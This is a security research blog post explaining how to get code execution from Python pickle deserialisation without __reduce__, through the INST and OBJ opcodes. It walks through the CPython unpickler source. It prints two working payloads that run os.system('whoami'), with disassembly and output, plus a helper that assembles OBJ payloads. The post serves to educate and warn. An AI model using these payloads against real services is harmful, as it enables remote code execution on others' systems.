Python Pickle RCE without __reduce__
December 23, 2022
“Every single pickle deserialisation payload uses __reduce__… I wonder if it’s possible to get RCE without it”
And that’s how I nerdsniped myself and lost 5h of my life.
Yes, it’s possible, here are two functional payloads:
>>> inst_bomb
b'(S"whoami"\nios\nsystem\n.'
>>> pickletools.dis(inst_bomb)
    0: (    MARK
    1: S        STRING     'whoami'
   11: i        INST       'os system' (MARK at 0)
   22: .    STOP
highest protocol among opcodes = 0
>>> pickle.loads(inst_bomb)
alol

>>> obj_bomb
b'(cos\nsystem\nS"whoami"\no.'
>>> pickletools.dis(obj_bomb)
    0: (    MARK
    1: c        GLOBAL     'os system'
   12: S        STRING     'whoami'
   22: o        OBJ        (MARK at 0)
   23: .    STOP
highest protocol among opcodes = 1
>>> pickle.loads(obj_bomb)
alol
This blog post won’t explain:
- What (de)serialization is and the vulnerabilities that can arise; PortSwigger’s Web Security Academy has already done a great job at that.
- What the pickle module is; its inner workings have already been thoroughly explained in this great blog post and in
However, what it will detail is how the REDUCE primitive could have been found and how to find novel (to my knowledge) exploit primitives.
For some additional reading, here are links to the best research done on pickle deserialization.
- Dangerous pickles — malicious python serialization [blog]: Already linked above, the best article to date on pickle deserialization, very well explained.
- Never a dill moment: Exploiting machine learning pickle files [blog] [conf]: On the resurgence in the use of pickle for Machine Learning and its security implications.
- Pain Pickle: Systemically bypassing restricted unpickle [conf] [slides]: Great research (in Cantonese) on how to systematically bypass RestrictedUnpicklers to achieve RCE.
The REDUCE primitive
Before looking for new exploit paths it’s a good idea to first understand how the existing one works by diving into the source code.
NB: Pre-existing comments in the source code have been removed for the sake of clarity.
When the REDUCE opcode is read, the main fetch-decode-execute loop calls the corresponding function (load_reduce):
def load_reduce(self):
    stack = self.stack
    args = stack.pop()        # pop args (tuple) off the top of the stack
    func = stack[-1]          # get value from top of the stack (function)
    stack[-1] = func(*args)   # call func with args -> RCE
    # arg1(*arg2) is a pattern that will come back later.
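To tie this back to __reduce__, here is a minimal sketch showing where the REDUCE opcode comes from. The Demo class is hypothetical, and the harmless len stands in for something like os.system; the point is only that whatever __reduce__ returns ends up being called as func(*args) by load_reduce.

```python
import pickle
import pickletools

class Demo:
    """Hypothetical class used for illustration only."""
    def __reduce__(self):
        # (callable, args): the unpickler will evaluate len("hello")
        return (len, ("hello",))

blob = pickle.dumps(Demo(), protocol=0)

# List the opcode names present in the serialized stream.
opcodes = [op.name for op, arg, pos in pickletools.genops(blob)]
print(opcodes)

# Loading the stream reaches load_reduce, which calls len("hello").
result = pickle.loads(blob)
print(result)
```

Note that the unpickled value is the return value of the call, not a Demo instance.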
The load_reduce function requires a function to have already been pushed onto the stack. There are a few ways of doing this, the easiest being to use either the GLOBAL or STACK_GLOBAL instructions. Both corresponding functions work in a very similar way: load_global reads the module and name variables as strings from the pickle stream, whilst load_stack_global pops both values off the stack.
def load_global(self):
    module = self.readline()[:-1].decode("utf-8")   # read module string
    name = self.readline()[:-1].decode("utf-8")     # read name string
    klass = self.find_class(module, name)           # call find_class
    self.append(klass)                              # append result to stack
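As a quick illustration of the difference between the two opcodes, the sketch below pushes the same (harmless) builtins.len onto the stack both ways. The byte strings are hand-assembled for this example and are not taken from the payloads above.

```python
import pickle

# GLOBAL ('c'): module and name are read as two newline-terminated lines.
via_global = pickle.loads(b"cbuiltins\nlen\n.")

# STACK_GLOBAL ('\x93'): module and name are first pushed as strings
# (SHORT_BINUNICODE: '\x8c' followed by a 1-byte length), then popped
# off the stack by the opcode.
via_stack_global = pickle.loads(b"\x8c\x08builtins\x8c\x03len\x93.")

print(via_global, via_stack_global)
```

In both cases the object left on the stack is whatever find_class returned for the given module and name.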
The call to find_class seems to be the important part of the function, so let’s investigate.
N.B: Since the PROTO opcode (protocol version, 0 by default) is optional and has no real influence on the program flow it has been omitted from the given payloads for the sake of brevity.
def find_class(self, module, name):
    sys.audit('pickle.find_class', module, name)
    if self.proto < 3 and self.fix_imports:
        ...  # fix the imports (body omitted)
    __import__(module, level=0)  # import the module
    if self.proto >= 4:  # both branches do the same thing
        return _getattribute(sys.modules[module], name)
    else:
        return getattr(sys.modules[module], name)  # return module.function
Being able to import functions and specific modules is an extremely useful primitive, thus the search for a REDUCE-less payload started by looking for functions calling find_class.
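This kind of search can also be scripted rather than done by eye. The sketch below is one possible way, assuming the pure-Python unpickler is reachable as pickle._Unpickler (a private CPython name) and that its source is available to inspect; callers_of is a hypothetical helper name.

```python
import inspect
import pickle

def callers_of(method_name):
    """Names of pickle._Unpickler methods whose source calls self.<method_name>(...)."""
    needle = f"self.{method_name}("
    found = []
    for name, func in inspect.getmembers(pickle._Unpickler, inspect.isfunction):
        if needle in inspect.getsource(func):
            found.append(name)
    return found

find_class_callers = callers_of("find_class")
print(find_class_callers)
```

A plain substring match is crude, but it is enough to shortlist the handlers worth reading. The same helper can be pointed at any other method of the unpickler.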
The INST primitive
The only other interesting function that calls find_class is the load_inst function:
def load_inst(self):
    module = self.readline()[:-1].decode("ascii")    # read module string
    name = self.readline()[:-1].decode("ascii")      # read name string
    klass = self.find_class(module, name)            # call find_class
    self._instantiate(klass, self.pop_mark())        # call _instantiate
The function ends with a call to _instantiate:
def _instantiate(self, klass, args):
    if (args or not isinstance(klass, type) or
            hasattr(klass, "__getinitargs__")):
        try:
            value = klass(*args)  # the arg1(*arg2) pattern reemerges
        except TypeError as err:
            raise TypeError("in constructor for %s: %s" %
                            (klass.__name__, str(err)), sys.exc_info())
    else:
        value = klass.__new__(klass)
    self.append(value)
Just like load_reduce, _instantiate takes a callable (klass) and a sequence of arguments (args) as parameters and calls the callable with those arguments (klass(*args), the same func(*args) pattern), allowing for arbitrary code execution. Below is an annotated example payload:
>>> pickletools.dis(b'(S"whoami"\nios\nsystem\n.', annotate=1)
    0: (    MARK                                    Push markobject onto the stack.
    1: S        STRING     'whoami'                 Push a Python string object.
   11: i        INST       'os system' (MARK at 0)  Build a class instance.
   22: .    STOP                                    Stop the unpickling machine.
highest protocol among opcodes = 0
>>> pickle.loads(b'(S"whoami"\nios\nsystem\n.')
alol
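For anyone wanting to poke at the INST path without running a shell command, here is a harmless variant. It is only a sketch: builtins.len and os.getpid are stand-ins chosen for this example, and the second payload illustrates the "not isinstance(klass, type)" part of the condition in _instantiate.

```python
import os
import pickle

# MARK, STRING 'hello', INST builtins.len  ->  len('hello')
with_args = pickle.loads(b'(S"hello"\nibuiltins\nlen\n.')

# MARK, INST os.getpid  ->  os.getpid(), with nothing between MARK and INST.
# A plain function is not a type, so it is still called instead of
# going through klass.__new__(klass).
without_args = pickle.loads(b"(ios\ngetpid\n.")

print(with_args, without_args == os.getpid())
```

So an empty argument list does not prevent the call, as long as the imported object is not a class.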
The OBJ primitive
The search for other functions calling _instantiate yielded only a single other function:
def load_obj(self):
    args = self.pop_mark()
    cls = args.pop(0)
    self._instantiate(cls, args)
It works in a very similar way to load_reduce: it obtains a callable (cls, the first item above the MARK) and its arguments (the remaining items), then calls the callable with those arguments. Below is an annotated example payload:
>>> pickletools.dis(b'(cos\nsystem\nS"whoami"\no.', annotate=1)
    0: (    MARK                        Push markobject onto the stack.
    1: c        GLOBAL     'os system'  Push a global object (module.attr) on the stack.
   12: S        STRING     'whoami'     Push a Python string object.
   22: o        OBJ        (MARK at 0)  Build a class instance.
   23: .    STOP                        Stop the unpickling machine.
highest protocol among opcodes = 1
>>> pickle.loads(b'(cos\nsystem\nS"whoami"\no.')
alol
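The OBJ layout (MARK, callable, arguments, OBJ, STOP) is regular enough to assemble programmatically. The helper below, obj_payload, is a hypothetical name for a rough sketch that only handles simple string arguments; it is demonstrated with the harmless builtins.len and checked against both the C unpickler and the pure-Python one (pickle._Unpickler, a private CPython name).

```python
import io
import pickle

def obj_payload(module, name, *str_args):
    """Hypothetical helper: assemble MARK, GLOBAL, STRING..., OBJ, STOP."""
    out = b"(" + b"c" + module.encode("ascii") + b"\n" + name.encode("ascii") + b"\n"
    for arg in str_args:
        # Assumption: arguments contain no quotes, backslashes or newlines.
        if set(arg) & set("\"'\\\n"):
            raise ValueError("unsupported character in argument")
        out += b'S"' + arg.encode("ascii") + b'"\n'
    return out + b"o."

payload = obj_payload("builtins", "len", "hello")
print(payload)

# Both unpickler implementations should agree on the result.
c_result = pickle.loads(payload)
py_result = pickle._Unpickler(io.BytesIO(payload)).load()
print(c_result, py_result)
```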
Please stop using pickle. Attempts to make pickle secure are meaningless (except for adding data signing with HMAC, I guess), as the hacker will forever subvert the developer.
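For completeness, the HMAC idea could look roughly like the sketch below. The names dumps_signed, loads_signed and SECRET_KEY are hypothetical, and the whole thing assumes the key is never exposed to whoever controls the serialized bytes; it authenticates the data and does nothing to make unpickling itself safer.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-secret"  # assumption: unknown to the attacker
TAG_SIZE = hashlib.sha256().digest_size      # 32 bytes

def dumps_signed(obj):
    data = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return tag + data  # tag first, then the pickle itself

def loads_signed(blob):
    tag, data = blob[:TAG_SIZE], blob[TAG_SIZE:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    # Constant-time comparison; reject before the unpickler sees anything.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature, refusing to unpickle")
    return pickle.loads(data)
```

The signature check has to happen before pickle.loads is called, since by the time the unpickler runs it is already too late.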